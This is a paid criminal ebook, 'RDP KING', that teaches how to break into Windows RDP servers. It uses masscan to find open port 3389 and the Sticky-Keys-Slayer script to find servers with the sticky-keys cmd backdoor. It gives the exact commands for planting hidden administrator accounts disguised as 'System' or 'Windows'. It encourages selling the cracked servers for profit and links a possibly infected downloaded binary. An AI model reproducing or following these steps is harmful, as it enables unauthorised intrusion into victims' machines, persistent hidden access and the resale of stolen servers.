DISCORD SUPPORT ➤ PunchMan#1250

INTRODUCTION
Hello and thank you for your purchase !

Welcome to RDP KING.

By doing this tutorial step by step you will learn :

➜ How to find potentially vulnerable RDP’s using powerful script.
➜ How to make you owner of the RDP’s.
➜ How does the script work ?

➜ How you can use the servers you will crack.

 Before we start I want to make sure that you know some
server-related words:
➜ VPS: Virtual Private Server, it's basically a private server that runs
inside a “dedicated” (normal) server. It is a virtual environment, like a
Virtual Machine.
➜ RDP: Remote Desktop Protocol, it’s the protocol we use to connect to
Windows VPSs, we also call RDP a Windows VPS itself.
Now, let’s talk about the OS and software we are going to use. I
recommend using a Windows and a Linux environment (like Kali Linux).
If you are using Windows, as many users do, you can easily install a Kali
Linux Virtual Machine on your Windows PC. (It is recommended to use a
standalone windows OS, instead)
You can quickly create a Virtual Machine with the help of Google or
following guides from YouTube.
Example :
https://www.youtube.com/watch?v=SVyWeQTtHu8

HOW DOES THE SCRIPT WORK?

The script we are going to use is entirely based on a kind of
bug/exploit: some servers make the cmd pop up when we press the
shift button 5 times, without the need of logging in. This let us become
the administrator of the machine, so that we can create a new user and
give him the full admin permissions.. This also means that the real
owner of the RDP cannot see what we are running on the machine
 COLLECTING THE IP ADDRESSES:
MASSCAN
The first step to start cracking RDPs consist in finding IP addresses with
port 3389 OPEN.
The fastest way to do that is collecting IP ranges and then finding which
ones have port 3389 open. In this guide we are going to use masscan,
but you can use another program, masscan is just the tool I always use
and I think it’s the fastest port scanner.
If you are going to run Masscan on a RDP just be aware that some
companies does not allow to run such a program on their servers and
this might result in a ban.

1) Download and install on Windows the latest version of WinPCap

(https://www.winpcap.org/)
2) Download Masscan GUI https://mega.nz/#!JEU2nS6K!2-
8_fQv9LVfcEzXCyhohft-xOsE4JUutPV9W7QtSe5Y (95% it’s not infected,
but just a false positive, you can run it sandboxed to be 100% safe)
3) Go to http://services.ce3c.be/ciprg/ and put desired country then click
« Generate » (see picture below)
4) Copy a bunch of lines that the website has generated
(see picture below)
5) Open masscan and and make it look like this the lines in the black box
(Format example : 2.0.0.0-255.240.0.0)

6) Change the target port to 3389 and (if you have a good connection)
you can set a greater number of threads.
7) Wait until masscan ends or until you have collected some thousands
of IPs (10000+ recommended)
8) After gathering the needed IPs you can stop masscan (ctrl+c to stop
the running scan)
9) Now you can click the “open results” button and enjoy your txt file
with all the IPs! Otherwise you can also open the txt file from the
masscan directory.

MOVING THE IP’s TO KALI LINUX

Once you have your txt file ready with the IPs we need to move the file
from windows to the Linux environment. The file must contain 1 IP each
line, if your file does not you can easily extract the IP’s using this site:
http://www.toolsvoid.com/extract-ip-addresses

The easiest way to move the file is uploading it on https://anonfile.com/

and then downloading the file in the Linux environment (using the
download link that anonfile gives you)

Keep in mind the location of the txt file containing the IP’s.
 SETTING UP THE SCRIPT
Before running the cracking script you will need to download and install
some application and modules, to make sure that everything will work
without error messages.
Open the Kali Linux terminal and run these commands. Sometimes you
need to enter “y” to continue. (root permissions needed):
apt-get update
apt-get -y install imagemagick xdotool parallel bc
apt-get install rdesktop git

DOWNLOADING AND
RUNNING THE SCRIPT
To clone (clone=download) the script run the following command, it is
recommended to clone the script in the root directory (=main directory).
Run this command to clone the script:
git clone https://github.com/linuz/Sticky-Keys-Slayer.git

Now, a directory called “Sticky-Keys-Slayer” has been created. To enter

that directory we use the command:
cd Sticky-Keys-Slayer

Before Starting to run the script you will need to put in that directory
the txt file containing the IP’s we have found using masscan, an easy
way to do that is opening the file explorer and copying the txt file and
pasting in the Sticky-Keys-Slayer directory.
Let’s suppose that you called the IPs file IPs.txt
Run in the terminal the command:
 ./stickyKeysSlayer.sh -v -j8 -t 10 IPs.txt

Where IP’s.txt is the name of the file containing the IPs.

Here is a sample picture:

The script will now be running and you will see some rdesktop tabs
popping up. Note that you should not use the PC while the script is
running, but if you setup everything on Virtual Machine you can still use
it like before.

FINDING OUT VULNERABLE RDP’s

When the script ends, or when it gets aborted, it’s time to find out which
RDP’s are vulnerable, here is how to do it.
In the Sticky-Keys-Slayer slayer directory you will find a folder called
“screenshots”; it contains a screenshot for every RDP you have scanned,
inside the screenshot folder there will be another folder called
“discovered”. It contains the screenshot of the vulnerable RDPs.

Some of them are false positives but if the screenshot show the CMD
it’s probably a good result. Here is an example:
 CREATING A NEW USER
Before creating new users with admin permissions on vulnerable servers
I have to warn you that if the following commands do not work on a
server you are trying to crack it is likely that the server is not exploitable
and there is nothing you can do.

As mentioned before, the “discovered” folder contains all the server

that show a cmd, open that folder to know the IP addresses of those
servers. The IP address is written in the file name of the screenshot and
at the top of the screenshot itself.

Now, open the terminal and execute this command to try to connect to a
“discovered” RDP.
rdesktop [ip address of vulnerable server]

You will see a rdesktop tab opening. On that rdesktop tab try to press
the SHIFT button 5 times, you will probably see the cmd appearing,
however in some cases you need to press shift 6+ times.

If you pressed shift and nothing happens probably the server you are
trying to crack is not exploitable, it’s just a false positive.

If the cmd opens up correctly run this command to create a new user:
net user /add [username] [password]

Where [username] is the username you choose, I strongly recommend

to use a name like “System” or “Windows” or “Other User” to avoid
being suspicious. You can choose whatever you want as password, just
make sure not to forget it! Write it down somewhere, and easy way to
identify cracked servers is [username]@[IP];[password] like
Windows@201.34.5.134;U4G8
Now to give your account full administrator functions run this command:
net localgroup Administrators [username] /add

Your have successfully managed to create a new admin user so you

have finally cracked the server, to login use the [IP] and the [username]
and [password] you just chose.

Obviously you will now have to repeat this steps for every
server you find in the “discovered” folder.
 CONCLUSIONS
I have taught you this advanced and private method to crack RDP’s, if
you have some question I can do my best to help you, add me on
Discord : PunchMan#1250

With this advanced script you can crack about 3-15 servers every day
just by running it overnight.

You can do almost everything on the cracked servers, but if you use a lot
of system resources it’s possible that your server will be banned.

The hardaware specs of the servers you crack are kind of random, there
is no way to predict how good/bad the server you are going to crack will
be; also the Windows version is random, you will usually find Windows
2003-XP-2008- 7-2012

A great way to make money with these servers is selling them, I made a
decent amount of money selling servers, but of course you need to
restock your shop regularry and this takes time. Cracked servers are
often good for cracking, too.
Here are some proof from my Selly.gg :

I really hope this book has helped you, good cracking!

THIS EBOOK IS ONLY SOLD BY WHITEDEV AT :

https://shoppy.gg/@WhiteDEV